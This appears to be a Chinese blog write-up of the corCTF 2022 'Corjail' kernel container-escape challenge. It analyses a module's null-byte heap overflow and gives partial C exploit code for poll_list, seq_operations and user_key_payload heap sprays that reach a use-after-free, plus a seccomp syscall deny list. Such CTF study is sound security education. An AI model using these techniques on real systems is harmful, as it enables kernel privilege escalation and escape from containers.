corCTF-2022:Corjail-内核容器逃逸

peiwithhao · 发表于 2023-10-27 00:34

corCTF2022-corjail

出题人D3V17关于本题的文章在这里

由于这是本人第一次写有关于Linux kernel+Docker escape的题型，所以下面会尽可能详细的写下解题步骤

首先是给出第一次启动的图，十分的炫酷捏

0x00 题目结构分析

./
├── README.md
└── task
    ├── build
    │   ├── build_image.sh
    │   ├── build_kernel.sh
    │   ├── coros
    │   │   └── files
    │   │       ├── bin
    │   │       │   ├── init
    │   │       │   └── jail
    │   │       ├── config
    │   │       │   ├── init.service
    │   │       │   ├── motd
    │   │       │   └── serial-getty@.service
    │   │       ├── docker
    │   │       │   ├── Dockerfile
    │   │       │   ├── image
    │   │       │   │   └── image.tar.gz
    │   │       │   └── seccomp.json
    │   │       ├── flag.txt
    │   │       └── module
    │   │           ├── cormon.ko
    │   │           ├── modules.dep
    │   │           └── modules.dep.bin
    │   └── kernel
    │       └── patch
    ├── chall
    │   ├── bzImage
    │   ├── cormon.ko
    │   ├── run_challenge.sh
    │   └── seccomp.json
    └── flag-license-website
        ├── app
        │   ├── app.py
        │   ├── encryption.py
        │   ├── requirements.txt
        │   ├── static
        │   │   ├── css
        │   │   │   ├── 1d2e0db7bdadca0cdc47367126aadc25.css
        │   │   │   ├── 20cc687b2730725b9aac594e2a77819c.css
        │   │   │   └── 38ec85f45423ec52e9d1f2f778e847ed.css
        │   │   ├── images
        │   │   │   ├── 639ea56cc818bb6c6388719b4bdd1c7a.png
        │   │   │   ├── 7c6877ac5a9ca7acdcde196ed91c6799.png
        │   │   │   ├── bb5851739df3c7426a0686449cb04974.png
        │   │   │   ├── d4275f26e6700049f85155adda41c9a1.jpg
        │   │   │   └── favicon.ico
        │   │   └── js
        │   │       └── efbd3bc838f31c807a42211a4bce2cd2.js
        │   └── templates
        │       ├── index.html
        │       ├── result.html
        │       └── unlock.html
        ├── docker-compose.yml
        └── Dockerfile

18 directories, 38 files

可以看到文件结构还是十分的复杂，首先我们所要做的事情就是听人劝吃饱饭，先读读 README.md

Solves: 1

Author: D3v17

Description:

Containerized environments are no longer a safe place.
Evil hackers continue to refine their secret techniques to bypass modern kernel protectons.
CoRJail, as part of CoROS, is designed to stop them!

With CoRJail, several dangerous syscalls, like msgsnd/msgrcv, are blocked by custom seccomp filters.
Syscall usage is constantly monitored with CoRMon, so that kernel exploit patterns can rapidly be detected.

Try the default CoRMon filter with `cat /proc_rw/cormon` and monitor syscall usage like a boss!
Still not satisfied? Set a custom filter with `echo -n 'sys_msgsnd,sys_msgrcv' > /proc_rw/cormon`.

Wanna access all the other CoROS features? Buy a CoR SaaS License for only $31337.00/mo!
Hackers' days are numbered!

Flag: `corctf{C0R_J4!L_H@S_B33N_PWN3D_991cd43a402cda6c}`

出题者 D3v17跟 BitsByWill师傅好像经常成对在corctf贡献例题，tql

话说回来，上面这段话给了我们的信息是可以通过 echo -n 'sys_msgsnd,sys_msgrcv' > /proc_rw/cormo来修改我们的 Cormon filter,该过滤器检测了我们使用系统调用的一些简单信息，这在之后我们再来讨论，先说会题目环境的问题

由于本人在docker领域仍是一个新的不能再新手，所以在看到题目给出的文件结构是十分难绷的

扭头可以看到唯一十分熟悉的是 chall/目录下的文件，这里第一时间查看他的 run_challenge.sh

如下：

#!/bin/sh
qemu-system-x86_64 \
    -m 1G \
    -nographic \
    -no-reboot \
    -kernel bzImage \
    -append "console=ttyS0 root=/dev/sda quiet loglevel=3 rd.systemd.show_status=auto rd.udev.log_level=3 oops=panic panic=-1 net.ifnames=0 pti=on" \
    -hda coros.qcow2 \
    -snapshot \
    -monitor /dev/null \
    -cpu qemu64,+smep,+smap,+rdrand \
    -smp cores=4 \
    --enable-kvm

可以看到其中也是使用到了一个拷在硬盘上的文件系统 coros.qcow2，在出题人的github上也说明由于过于庞大所以我们需要自己使用 build/build_image.sh来进行构建，

同样的我们在 build文件目录下也看到了一个 build_kernel.sh的脚本，可以使用他来编译内核，但在编译的过程当中可能会出现SSL报错问题，并且由于是单核编译所以慢的不能再慢，因此这里给出的解决办法是将编译选项 MODULE_SIG_ALL取消选择即可。

要查询给定硬盘上的文件系统，我们需要首先将其挂载再我们的某个硬盘设备下，这里给出挂载/卸载脚本

### mount.bash
#!/bin/bash
set -eu

MNTPOINT=/tmp/hoge
QCOW=$(realpath "${PWD}"/../build/coros/coros.qcow2)

sudo modprobe nbd max_part=8
mkdir -p $MNTPOINT
sudo qemu-nbd --connect=/dev/nbd0 "$QCOW"
sudo fdisk -l /dev/nbd0
sudo mount /dev/nbd0 $MNTPOINT

### umount.bash
#!/bin/bash

set -eu
MNTPOINT=/tmp/hoge

sudo umount $MNTPOINT || true
sudo qemu-nbd --disconnect /dev/nbd0
sudo rmmod nbd

我们在挂载的文件系统当中查看 etc/inittab文件，该文件内进行了运行级别的配置

T0:23:respawn:/sbin/getty -L ttyS0 115200 vt100

然后通过 /etc/systemd/system/init.service来查看服务进程

[Unit]
Description=Initialize challenge

[Service]
Type=oneshot
ExecStart=/usr/local/bin/init

[Install]
WantedBy=multi-user.target

然后我们来看其中的服务条目，查看 ExecStart所对应的 /usr/local/bin/init脚本

#!/bin/bash

USER=user

FLAG=$(head -n 100 /dev/urandom | sha512sum | awk '{printf $1}')

useradd --create-home --shell /bin/bash $USER

echo "export PS1='\[\033[01;31m\]\u@CoROS\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]# '"  >> /root/.bashrc
echo "export PS1='\[\033[01;35m\]\u@CoROS\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '" >> /home/$USER/.bashrc

chmod -r 0700 /home/$USER

mv /root/temp /root/$FLAG
chmod 0400 /root/$FLAG

其中大概含义是首先创建一个名叫user的普通用户，然后给了我们一个好看的shell提示符:)，之后将flag设置为root权限，在这之后我们查看 etc/passwd

root:x:0:0:root:/root:/usr/local/bin/jail
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.......

我们再进一步查看root用户的shell usr/local/bin/jail,如下：

#!/bin/bash

echo -e '[\033[5m\e[1;33m!\e[0m] Spawning a shell in a CoRJail...'
/usr/bin/docker run -it --user user --hostname CoRJail --security-opt seccomp=/etc/docker/corjail.json -v /proc/cormon:/proc_rw/cormon:rw corcontainer
/usr/sbin/poweroff -f

这里最终发现整体结构是启动了root的 shell后是首先调用 docker来构建了一个容器然后关闭自身，在那之后我们起的虚拟环境就是处于该docker容器当中，这一点搞懂了十分舒畅 :^)

因此这里我们可以直接修改其中要素，将上面的文件修改为

#!/bin/bash

echo -e '[\033[5m\e[1;33m!\e[0m] Spawning a shell in a CoRJail...'
#/usr/bin/docker run -itd --user user --hostname CoRJail --security-opt seccomp=/etc/docker/corjail.json -v /proc/cormon:/proc_rw/cormon:rw corcontainer
/bin/bash
/usr/sbin/poweroff -f

这样我们就可以将docker容器在后台运行然后得到一个 真正的本地root权限shell，而并非在docker当中，在其中我们使用 docker images来查看docker镜像情况

我们发现其中有两个容器镜像是在 usr/local/bin/jail之前就已经存在,那么他们是从哪儿来的呢，我们查看 build_image.sh文件，也就是我们获取该文件系统镜像的脚本，其中有一部分如下：

```build_image.sh

Copy docker image

tar -xzvf coros/files/docker/image/image.tar.gz -C coros/files/docker
cp -rp coros/files/docker/var/lib/docker $FS/var/lib/
rm -rf coros/files/docker/var


这里为了方便我们之后漏洞调试的工作，所以我们此时将其启动脚本修改为如下部分

```usr/local/bin/jail
#!/bin/bash

echo -e '[\033[5m\e[1;33m!\e[0m] Spawning a shell in a CoRJail...'
cp /exploit /home/user || echo "[!] exploit not found, skipping"
chown -R user:user /home/user
echo 0 > /proc/sys/kernel/kptr_restrict
/usr/bin/docker run -it --user root \
  --hostname CoRJail \
  --security-opt seccomp=/etc/docker/corjail.json \
  --add-cap CAP_SYSLOG \
  -v /proc/cormon:/proc_rw/cormon:rw \
  -v /home/user/:/home/user/host \
  corcontainer
/usr/sbin/poweroff -f

下面按照行号来讲解

第四行，在我们挂载的文件系统当中创建的 exploit文件复制到 home/user文件目录下

第五行，修改该目录下的用户以及用户组所有权(

第六行，这里普及一下相关知识，这里主要是查看proc文件的官方手册

The value in this file determines whether kernel addresses are exposed via /proc files and other interfaces.   A  value  of  0  in  this file imposes no restrictions.  If the value is 1, kernel pointers printed using the %pK format specifier will be replaced with zeros unless the user  has the  CAP_SYSLOG  capability.   If  the  value is 2, kernel pointers printed using the %pK format specifier will be replaced with zeros regardless of the user's capabilities.   The  initial  default  value for this file was 1, but the default was changed to 0 in Linux 2.6.39.  Since Linux 3.4, only users with the CAP_SYS_ADMIN capability can change the value in this file.

这里不放中文是有可能翻译过来损失了原本的含义，所以这里仅给出原文和个人的见解

如果该值为0，则不产生任何影响，如果该值为1，则使用 %pK格式化打印的内核指针将会替换为0，在这种情况下用户也可以将所属用户空间的标志位设置有 CAP_SYSLOG来进行绕过。而如果该值为2，则即使用户设置了 CAP_SYSLOG也会将内核指针地址置0.

第七行，为该容器添加 CAP_SYSLOG用户空间标志

第十一行，十二行，从根文件系统绑定用户目录到docker容器

在这之后我们就可以方便的以root来查看我们的符号表，如下：

除此之外，smallkirby师傅的博客中推荐了一下其自行实现的一个小工具，它可以更加方便我们的内核环境的相关信息获取虽然本人并没有在本题来使用他，这里先记录一下

0x01 漏洞模块逆向

1.杂项

在题目所给文件当中给出了 build/kernel/patch文件

diff -ruN a/arch/x86/entry/syscall_64.c b/arch/x86/entry/syscall_64.c
--- a/arch/x86/entry/syscall_64.c        2022-06-29 08:59:54.000000000 +0200
+++ b/arch/x86/entry/syscall_64.c        2022-07-02 12:34:11.237778657 +0200
@@ -17,6 +17,9 @@

 #define __SYSCALL_64(nr, sym) [nr] = __x64_##sym,

+DEFINE_PER_CPU(u64 [NR_syscalls], __per_cpu_syscall_count);
+EXPORT_PER_CPU_SYMBOL(__per_cpu_syscall_count);
+
 asmlinkage const sys_call_ptr_t sys_call_table[__NR_syscall_max+1] = {
         /*
          * Smells like a compiler bug -- it doesn't work
diff -ruN a/arch/x86/include/asm/syscall_wrapper.h b/arch/x86/include/asm/syscall_wrapper.h
--- a/arch/x86/include/asm/syscall_wrapper.h        2022-06-29 08:59:54.000000000 +0200
+++ b/arch/x86/include/asm/syscall_wrapper.h        2022-07-02 12:34:11.237778657 +0200
@@ -245,7 +245,7 @@
  * SYSCALL_DEFINEx() -- which is essential for the COND_SYSCALL() and SYS_NI()
  * macros to work correctly.
  */
-#define SYSCALL_DEFINE0(sname)                                                \
+#define __SYSCALL_DEFINE0(sname)                                                \
         SYSCALL_METADATA(_##sname, 0);                                        \
         static long __do_sys_##sname(const struct pt_regs *__unused);        \
         __X64_SYS_STUB0(sname)                                                \
diff -ruN a/include/linux/syscalls.h b/include/linux/syscalls.h
--- a/include/linux/syscalls.h        2022-06-29 08:59:54.000000000 +0200
+++ b/include/linux/syscalls.h        2022-07-02 12:34:11.237778657 +0200
@@ -82,6 +82,7 @@
 #include <linux/key.h>
 #include <linux/personality.h>
 #include <trace/syscall.h>
+#include <asm/syscall.h>

 #ifdef CONFIG_ARCH_HAS_SYSCALL_WRAPPER
 /*
@@ -202,8 +203,8 @@
 }
 #endif

-#ifndef SYSCALL_DEFINE0
-#define SYSCALL_DEFINE0(sname)                                        \
+#ifndef __SYSCALL_DEFINE0
+#define __SYSCALL_DEFINE0(sname)                                        \
         SYSCALL_METADATA(_##sname, 0);                                \
         asmlinkage long sys_##sname(void);                        \
         ALLOW_ERROR_INJECTION(sys_##sname, ERRNO);                \
@@ -219,9 +220,41 @@

 #define SYSCALL_DEFINE_MAXARGS        6

-#define SYSCALL_DEFINEx(x, sname, ...)                                \
-        SYSCALL_METADATA(sname, x, __VA_ARGS__)                        \
-        __SYSCALL_DEFINEx(x, sname, __VA_ARGS__)
+DECLARE_PER_CPU(u64[], __per_cpu_syscall_count);
+
+#define SYSCALL_COUNT_DECLAREx(sname, x, ...) \
+        static inline long __count_sys##sname(__MAP(x, __SC_DECL, __VA_ARGS__));
+
+#define __SYSCALL_COUNT(syscall_nr) \
+        this_cpu_inc(__per_cpu_syscall_count[(syscall_nr)])
+
+#define SYSCALL_COUNT_FUNCx(sname, x, ...)                                        \
+        {                                                                        \
+                __SYSCALL_COUNT(__syscall_meta_##sname.syscall_nr);                \
+                return __count_sys##sname(__MAP(x, __SC_CAST, __VA_ARGS__));        \
+        }                                                                        \
+        static inline long __count_sys##sname(__MAP(x, __SC_DECL, __VA_ARGS__))
+
+#define SYSCALL_COUNT_DECLARE0(sname) \
+        static inline long __count_sys_##sname(void);
+
+#define SYSCALL_COUNT_FUNC0(sname)                                        \
+        {                                                                \
+                __SYSCALL_COUNT(__syscall_meta__##sname.syscall_nr);        \
+                return __count_sys_##sname();                                \
+        }                                                                \
+        static inline long __count_sys_##sname(void)
+
+#define SYSCALL_DEFINEx(x, sname, ...)                        \
+        SYSCALL_METADATA(sname, x, __VA_ARGS__)                \
+        SYSCALL_COUNT_DECLAREx(sname, x, __VA_ARGS__)        \
+        __SYSCALL_DEFINEx(x, sname, __VA_ARGS__)        \
+        SYSCALL_COUNT_FUNCx(sname, x, __VA_ARGS__)
+
+#define SYSCALL_DEFINE0(sname)                \
+        SYSCALL_COUNT_DECLARE0(sname)        \
+        __SYSCALL_DEFINE0(sname)        \
+        SYSCALL_COUNT_FUNC0(sname)

.......

着眼于该行，

+DEFINE_PER_CPU(u64 [NR_syscalls], __per_cpu_syscall_count);

他会为每个CPU都创建一个 __per_cpu_syscall_count变量用来记录系统调用的次数，具体功能可以参考该篇文章

还记得最开始出题人所给出的 README.md吗，我们此时可以使用一下他来看看

可以看到其中包含了使用到的系统调用在各个CPU当中的情况，这里暗含的一点就是 D3v17大师给予我们的一个漏洞利用即将用到的系统调用的小提示，可以看到截至目前被使用到的系统调用共有 sys_poll,sys_execve,sys_setxattr,sys_keyctl

若按步骤传递字符串之后效果如下：

这里给出之前我们提到的过滤规则

{
        "defaultAction": "SCMP_ACT_ERRNO",
        "defaultErrnoRet": 1,
        "syscalls": [
                {
                        "names": [ "_llseek", "_newselect", "accept", "accept4", "access", "add_key",<...> ],
                        "action": "SCMP_ACT_ALLOW"
                },
                {
                        "names": [ "clone" ],
                        "action": "SCMP_ACT_ALLOW",
                        "args": [ { "index": 0, "value": 2114060288, "op": "SCMP_CMP_MASKED_EQ" } ]
                }
        ]
}

这里有很多，是个白名单，我就也不全部贴出，下面是 smallkirby师傅整理出来的部分被禁止的系统调用，其中 msg*系列异常显眼

msgget
msgsnd
msgrcv
msgctl
ptrace
syslog
uselib
personality
ustat
sysfs
vhangup
pivot_root
_sysctl
chroot
acct
settimeofday
mount
umount2
swapon
swapoff
reboot
sethostname
setdomainname
iopl
ioperm
create_module
init_module
delete_module
get_kernel_syms
query_module
quotactl
nfsservctl
getpmsg
putpmsg
afs_syscall
tuxcall
security
lookup_dcookie
clock_settime
vserver
mbind
set_mempolicy
get_mempolicy
mq_open
mq_unlink
mq_timedsend
mq_timedreceive
mq_notify
mq_getsetattr
kexec_load
request_key
migrate_pages
unshare
move_pages
perf_event_open
fanotify_init
name_to_handle_at
open_by_handle_at
setns
process_vm_readv
process_vm_writev
kcmp
finit_module
kexec_file_load
bpf
userfaultfd
pkey_mprotect
pkey_alloc
pkey_free

2.漏洞模块

这里 D3v17师傅已经在博客当中给出了源码，十分贴心，接下来我们逐步来进行逆向

初始化

static int init_procfs(void)
{
    printk(KERN_INFO "[CoRMon::Init] Initializing module...\n");

    cormon = proc_create("cormon", 0666, NULL, &cormon_proc_ops);

    if (!cormon)
    {
        printk(KERN_ERR "[CoRMon::Error] proc_create() call failed!\n");
        return -ENOMEM;
    }

    if (update_filter(initial_filter))
        return -EINVAL;

    printk(KERN_INFO "[CoRMon::Init] Initialization complete!\n");

    return 0;
}

static const struct proc_ops cormon_proc_ops = {
    .proc_open  = cormon_proc_open,
    .proc_read  = seq_read,
    .proc_write = cormon_proc_write
};

static char initial_filter[] = "sys_execve,sys_execveat,sys_fork,sys_keyctl,sys_msgget,sys_msgrcv"                    
                                "sys_msgsnd,sys_poll,sys_ptrace,sys_setxattr,sys_unshare";

static int update_filter(char *syscalls)
{
    uint8_t new_filter[NR_syscalls] = { 0 };
    char *name;
    int nr;

    while ((name = strsep(&syscalls, ",")) != NULL || syscalls != NULL)
    {
        nr = get_syscall_nr(name);

        if (nr < 0)
        {
            printk(KERN_ERR "[CoRMon::Error] Invalid syscall: %s!\n", name);
            return -EINVAL;
        }

        new_filter[nr] = 1;
    }

    memcpy(filter, new_filter, sizeof(filter));

    return 0;
}

这里初始化部分很简单，首先创建 /proc/cormon进程，然后绑定了一个传入的函数表 cormon_proc_ops，其中具体实现我们之后细看，然后他会传入一个初始化的字符串，其中均是用 ,隔离的系统调用名，调用我们的 update_filter()函数来更新一个全局过滤器 filter,该过滤器记录了我们使用 cat /proc/cormon_rw所显示的系统调用

cormon_proc_open

static int cormon_proc_open(struct inode *inode, struct  file *file)
{
    return seq_open(file, &cormon_seq_ops);
}

static struct seq_operations cormon_seq_ops = {
    .start  = cormon_seq_start,
    .next   = cormon_seq_next,
    .stop   = cormon_seq_stop,
    .show   = cormon_seq_show
};

Nothing special....

cormon_proc_write

static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf, size_t count, loff_t *ppos) 
{
    loff_t offset = *ppos;
    char *syscalls;
    size_t len;

    if (offset < 0)
        return -EINVAL;

    if (offset >= PAGE_SIZE || !count)
        return 0;

    len = count > PAGE_SIZE ? PAGE_SIZE - 1 : count;

    syscalls = kmalloc(PAGE_SIZE, GFP_ATOMIC);
    printk(KERN_INFO "[CoRMon::Debug] Syscalls @ %#llx\n", (uint64_t)syscalls);

    if (!syscalls)
    {
        printk(KERN_ERR "[CoRMon::Error] kmalloc() call failed!\n");
        return -ENOMEM;
    }

    if (copy_from_user(syscalls, ubuf, len))
    {
        printk(KERN_ERR "[CoRMon::Error] copy_from_user() call failed!\n");
        return -EFAULT;
    }

    syscalls[len] = '\x00';

    if (update_filter(syscalls))
    {
        kfree(syscalls);
        return -EINVAL;
    }

    kfree(syscalls);

    return count;
}

这里可以看到有一个很明显的 Null Byte溢出，这里大概逻辑就是将我们传入的字符串首先复制到内核空间，这个空间通过 kmalloc获取一个4K大小的块，然后使用 update_filter函数来更新咱们的系统调用显示

cormon_seq_start

static void *cormon_seq_start(struct seq_file *s, loff_t *pos)
{
    return *pos > NR_syscalls ? NULL : pos;
}

在 seq_read()函数调用时会使用

cormon_seq_next

static void *cormon_seq_next(struct seq_file *s, void *v, loff_t *pos)
{
    return (*pos)++ > NR_syscalls ? NULL : pos;
}

cormon_seq_stop

static void cormon_seq_stop(struct seq_file *s, void *v)
{
    return;
}

cormon_seq_show

static int cormon_seq_show(struct seq_file *s, void *pos)
{
    loff_t nr = *(loff_t *)pos;
    const char *name;
    int i;

    if (nr == 0)
    {
        seq_putc(s, '\n');

        for_each_online_cpu(i)
            seq_printf(s, "%9s%d", "CPU", i);

        seq_printf(s, "\tSyscall (NR)\n\n");
    }

    if (filter[nr])
    {
        name = get_syscall_name(nr);

        if (!name)
            return 0;

        for_each_online_cpu(i)
            seq_printf(s, "%10llu", per_cpu(__per_cpu_syscall_count, i)[nr]);

        seq_printf(s, "\t%s (%lld)\n", name, nr);
    }

    if (nr == NR_syscalls)
        seq_putc(s, '\n');

    return 0;
}

该函数即为当我们使用 cat /proc_rw/cormon来显示该文件展现出的打印

而由于本题已经禁用了 unshare msg*等系统调用，所以我们平时十分常用的 msg_msg结构体也已经无法使用，接下来将会引入一个出题者在Google系统上使用到的一个特殊技术，那就是 poll_list，在这种情况下据出题人所述几乎有一个无限空间越界写的原语

0x02 poll_list基础

首先查看man手册

DESCRIPTION
       poll()  performs  a  similar task to select(2): it waits for one of a set of file descriptors to become ready to perform I/O.  The Linux-specific epoll(7) API performs a similar task, but offers features beyond those
       found in poll().

该poll系统调用是用来检测一组文件描述符的活动，当我们每次调用 poll()系统调用时，内核空间将会分配一个 poll_list结构体对象

int poll(struct pollfd *fds, nfds_t nfds, int timeout);

其中传递了三个参数

fds: pollfd类型的一个数组
nfds:前面的参数fds中条目的个数
timeout:事件发生的毫秒数

下面是相关的数据结构

struct pollfd {
        int fd;
        short int events;
        short int revents;
};

struct poll_list {
        struct poll_list *next;
        int len;
        struct pollfd entries[];
};

那么我们该如何分配一个 poll_list对象呢，

当我们调用 poll()系统调用，这里会调用到 do_sys_poll()

static int do_sys_poll(struct pollfd __user *ufds, unsigned int nfds,
                struct timespec64 *end_time)
{
        struct poll_wqueues table;
        int err = -EFAULT, fdcount, len;
        /* Allocate small arguments on the stack to save memory and be
           faster - use long to make sure the buffer is aligned properly
           on 64 bit archs to avoid unaligned access */
        long stack_pps[POLL_STACK_ALLOC/sizeof(long)];
        struct poll_list *const head = (struct poll_list *)stack_pps;
         struct poll_list *walk = head;
         unsigned long todo = nfds;

        if (nfds > rlimit(RLIMIT_NOFILE))
                return -EINVAL;

        len = min_t(unsigned int, nfds, N_STACK_PPS);
        for (;;) {
                walk->next = NULL;
                walk->len = len;
                if (!len)
                        break;

                if (copy_from_user(walk->entries, ufds + nfds-todo,
                                        sizeof(struct pollfd) * walk->len))
                        goto out_fds;

                todo -= walk->len;
                if (!todo)
                        break;

                len = min(todo, POLLFD_PER_PAGE);
                walk = walk->next = kmalloc(struct_size(walk, entries, len),
                                            GFP_KERNEL);
                if (!walk) {
                        err = -ENOMEM;
                        goto out_fds;
                }
        }

        ......

代码首先是在栈空间当中创建了一个256字节大小的缓冲区，其中能存放 30个 struct pollfd和1个 struct poll_list，如果说我们所需要传入的 pollfd大于30个的话，那么多余的部分将会保存在内核堆上，如果我们精确计算传入的 pollfd个数，那么我们可以分配的范围达到 kmalloc-32 ~ kmalloc-4k之大，也就是说如果我们传入了540个文件描述符的化，他在内核内存空间中的分配会按照下面的分配模式

内核栈30个 + 内核堆510个

该内核堆是从 kmalloc-4k获取，然而如果说我们传入了超过542个文件描述符呢，它同样会开辟适当的内核堆空间进行分配，这里我们做个比方，如果说我们传入542个文件描述符，他的分配情况会如下：

        ....
        poll_initwait(&table);
        fdcount = do_poll(head, &table, end_time);
        poll_freewait(&table);

         ....

out_fds:
        walk = head->next;
        while (walk) {
                struct poll_list *pos = walk;
                walk = walk->next;
                kfree(pos);
        }

        ....
}

在我们将所有传入的 poll_list复制到内核空间之后，调用 do_poll()函数来监视我们提供的文件描述符，直到发生特定事件或者计时器到期，这里的 end_time就是我们 poll系统调用所传入的第三个参数，也就是说只要我们愿意，该 poll_list内存块可以在内核中长期存在。

在 do_poll()函数调用完毕后，他将会接着调用 poll_freewait()函数来进行阻塞，直到发生事件或者计时器到期，在此之后会进行状态的写入，然后在 while 循环中释放我们的 poll_list，而这里如果 walk->next不为空的化，那么该kfree将会持续，所以我们这里要么是合法object，要么是NULL

由于调用 poll系统调用会阻塞自身，因此我们尝试使用线程来帮助我们完成这一工作 :)

这里可以写一个通用的模板来方便我们使用

#include <poll.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>

#define N_STACK_PPS 240
#define POLL_LIST_SIZE 16
#define POLLFD_SIZE 8;
#define PAGE_SIZE 4096

pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
int poll_tid[0x1000];
int fds[0x100];  //monitor target fd
int poll_threads;

struct poll_args{
    int t_id;           //thread_id
    int size;           //the size you want to allocated
    int timeout;
};

void alloc_poll_list(void *args){
    struct pollfd *pfds;
    int id, want_size, timeout, nfds;
    id = ((struct poll_args *)args)->t_id;
    want_size = ((struct poll_args *)args)->size;
    timeout = ((struct poll_args *)args)->timeout;

    /* nfds need modify :) */
    want_size = want_size - ((want_size/PAGE_SIZE)+1)*POLL_LIST_SIZE;
    nfds = (N_STACK_PPS + want_size)/POLLFD_SIZE;

    pfds = calloc(nfds, sizeof(struct pollfd));
    for(int i = 0; i < nfds; i++){
        pfds[0].fd = fds[0];
        pfds[0].events = POLLERR;
    }

    pthread_mutex_lock(&mutex);
    poll_threads++;
    pthread_mutex_unlock(&mutex);

    poll(pfds, nfds, timeout);

}

void create_poll_thread(int id, size_t size, int timeout){
    if(id < 0 || size < 0 || timeout < 0){
        printf("[x]create_poll_thread: Wrong argument!");
        exit(1);
    }

    /* Include the poll_list head */
    if(!(size%PAGE_SIZE == 0 || size%PAGE_SIZE < 0x10)){
        printf("[x]create_poll_thread: size you want have to be suitable!");
        exit(1);
    }
    struct poll_args *args;
    args = calloc(1, sizeof(struct poll_args));
    args->t_id = id;
    args->size = size;
    args->timeout = timeout;
    pthread_create((void *)&poll_tid[id], 0, (void *)alloc_poll_list, (void *)args); 
}

void join_poll_threads(){
    for(int i = 0; i < poll_threads; i++ ){
        pthread_join(poll_tid[i], NULL);
    }
    poll_threads = 0;
}

[...]

    fds[0] = open("/etc/passwd", O_RDONLY);
    create_poll_thread(0, 4096 + 4096 + 32, 3000);
    join_poll_threads();

[...]

0x03 漏洞利用

大致思路

仅仅一个NULL字节的溢出能够给我带来什么呢，我们想到最容易利用的就是指针了，如果说我们零字节可以覆盖一个结构体的第一个字节，并且该结构体的第一个字段为一个指针的化，那么我们就完成了一个指针的重定向，但是我们怎么能保证 0xdeadbeef和 0xdeadbe00都是合法指针且能为我们所用呢？

不必惊慌，堆喷会为我们解决这一切。

我们都知道，分配出来的slab都是以一个page为单位的，并且我们可以找到许多结构体，他们的大小可以被0x100所整除，例如 seq_operation、它的地址末一字节只有可能有以下几种情况 0x00、0x20、0x40、0x60、0x80、0xa0、0xc0、0xe0,因此如果说我们可以堆喷这样的一类结构体，然后将其中某个结构体的低一子节覆盖为 \x00，那么就会造成两个指针指向同一块地址的情况

知道了这个利用技巧，那么我们就来构造环境。

我们第一步首先是要选则恰当的结构体，上面举出的简单例子是0x20大小的结构体，恰好可以作为我们的目标，但是这还不够，还记得上面说到的在释放 poll_list的过程当中，如果 walk->next指针不为空，则会一直释放下去的事情吗，因此如果说我们的该结构体首8字节不为 NULL的化，那么很有可能在释放 poll_list的过程当中访问到非法地址导致panic，因此这里我们选择一个弹性大小的 user_key_payload结构体，他的首字段 user_key_payload.rcu在分配初期并不会进行初始化，很适合我们使用。

但虽说不会初始化，但难保其中不存有原先便存在的值，所以在堆喷 user_key_payload之前我们需要先用0将object的内容进行覆盖，出题者所给出的解决方案就是在 add_key之前使用 setxattr系统调用来首先分配出一个object然后覆盖其中的值为0，然后由于setxattr系统调用的特性，在结束后会自动将刚才申请的堆块进行释放，然后使得该堆块被分配为 user_key_payload

具体过程

1.前期准备

首先我们需要利用程序当中模块的漏洞，由于在上面的大致思路已经讲解，我们首先堆喷 seq_operations结构体，将我们 kmalloc-32的slab进行清洗，清洗完成后就可以开始堆喷我们的 victim struct，也就是 user_key_payload，此时现存的slab大致如下：

    for(int i = 0; i < SEQ_SPRAY_NR; i++){
        seq_id[i] = alloc_seq_op();
        if(seq_id[i] < 0){
            error_log("Allocate the seq_operations failed");
        }
    }

这里我可以确定其开启了 CONFIG_FREELIST_RANDOM和 CONFIG_FREELIST_HARDENED两个配置，具体可以在调试过程当中发现

上面图片截自部分kmalloc-32slab，我们可以看到其中的object有一部分是包含了四个内核地址，这个就是 seq_operations，其他的就是空闲的object，我们可以发现空闲object的next指针是位于0x10偏移处，并且是个很奇怪的值，因此推断肯定是开启了随机值异或的配置:)

因此这样更方便我们之后堆喷user_key_payload，当然在堆喷期间我们需要开启线程堆喷我们的 poll_list，这里需要堆喷的大小为 4096+32,这里注意我们使用到了 setxattr来首先将前8字节清空，具体原因在上面已经讲解，如下：

  for(int i = 0; i < 72; i++){
        setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
        sprintf(description, "payload_%d", i);
        memset(buff, i, sizeof(buff));
        key_id[i] = key_alloc(description, buff, 0x8);
        if(key_id[i] < 0){
            printf("[X]key index %d id is %d\n", i,key_id[i]);
            error_log("key alloc failed!");
        }
    } 

    info_log("Step IV: Spraying the poll_list in type 4096+32...");
    bind_core(1);
    for(int i = 0; i < 14; i++){
        create_poll_thread(i, 4096+32, 3000, 0);
    }
    bind_core(0);
    while(poll_threads != 14){};

    sleep(1);
    info_log("Step V: Spraying remain of the 0x20 user_key_payload...");
    for(int i = 72; i < USER_KEY_PAYLOAD_SPRAY_NR; i++){
        setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
        sprintf(description, "payload_%d", i);
        memset(buff, i, sizeof(buff));
        key_id[i] = key_alloc(description, buff, 0x8);
        if(key_id[i] < 0){
            printf("[X]key index %d id is %d\n", i,key_id[i]);
            error_log("key alloc failed!");
        }
    }

2.漏洞利用

构造成上述环境后我们就可以利用我们的漏洞模块，设置size为4096就可以造成一个零字节溢出，如下：

    info_log("Step VI: Insert the proc_rw/cormons's 4096 object and free random one user_key_payload..");
    write(proc_fd, data, 4096); 
    join_poll_threads();

我们也可以通过调试来看看，首先可以查看一下漏洞模块分配到的kmalloc-4k的块

其中rax就是我们分配到的4k块，此时仅仅是才分配还没有进行溢出操作，因此我们又接着看了它相邻的4k块，好的，接下来我们执行完 cormon_proc_write函数，查看溢出后的效果

可以看到确实将相邻 poll_list->next指针的低一字节覆盖为0，然后我们查看其中目标发现确实是我们的序号为0x8e的 user_key_payload

什么?你说如果碰巧指向了 seq_operations或者其他的poll_list是不是很难办.

难办?难办那就别办咯!（掀桌）

实际上我们堆喷的大部分仍然是user_key_payload，因此出现这种情况并不是很多，若出现了那只能说是一边承认自己脸黑一边重开了(

3.地址泄露

好的接下来我们获得了内核当中两个指针分别都指向一个 user_key_payload,此时我们只需要等带 poll_list超时自动释放链条上的所有堆块，这里肯定会将该 victim user_key_payload释放，这样就构造出来UAF供我们使用，此时我们再堆喷 seq_operations来获取它

    info_log("Step VII: Construct UAF by seq_operations...");
